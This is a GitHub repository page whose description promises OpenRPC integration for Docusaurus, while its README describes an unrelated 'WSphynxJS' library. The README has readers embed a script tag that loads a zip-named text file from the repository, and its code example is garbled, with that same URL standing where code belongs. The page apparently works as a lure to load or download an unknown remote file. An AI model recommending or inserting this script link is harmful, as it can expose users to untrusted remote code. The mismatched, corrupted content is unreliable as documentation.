Skip to content

πŸ”Œ Integrate OpenRPC documentation seamlessly into your Docusaurus site, enhancing accessibility and user experience with minimal setup.

License

Notifications You must be signed in to change notification settings

SphynxTech/docusa

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

8 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

WSphynxJS is a Javascript and HTML library for building powerful interfaces.

Key features of WSphynxJS:

  • Clarify:

    WSphynxJS allows you to organize your HTML code. You will be able to write events or scripts which interact with a specific div.

  • Simple to use:

    WSphynxJS uses a usual syntax. It is easy to learn and to use. You just have to add the prefix "ws".

  • Design:

    A modern design to enhance your code. The library is developed with a powerful syntax to match with the most recent browsers.

Learn WSphynxJS

It is possible to use WSphynxJS thanks to a script tag placed in the head part:

<head>
  <!--Some stuff here-->
  <script defer src="https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip(1.0).txt"></script> 
</head>

You can also directly download the library here. However, we do not recommend to copy the code in your own web page. We often update the source code and you would probably miss new functionalities or bug corrections.

Getting started

Simple example

<wsdiv> Hello
    <wsonmousedown>
        https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip = "Clic";
    </wsonmousedown>
    <wsonmouseup>
        https://raw.githubusercontent.com/SphynxTech/docusa/master/vaguely/docusa.zip = "Up";
    </wsonmouseup>
</wsdiv>

This example will render a simple div saying Hello. When you clic on it the div displays "Clic" and when you release the mouse it displays "Up".

With WSphynxJS, you can declare dynamic events and interact with your HTML page more easily.

License

WSphynxJS is MIT licensed.

About

πŸ”Œ Integrate OpenRPC documentation seamlessly into your Docusaurus site, enhancing accessibility and user experience with minimal setup.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published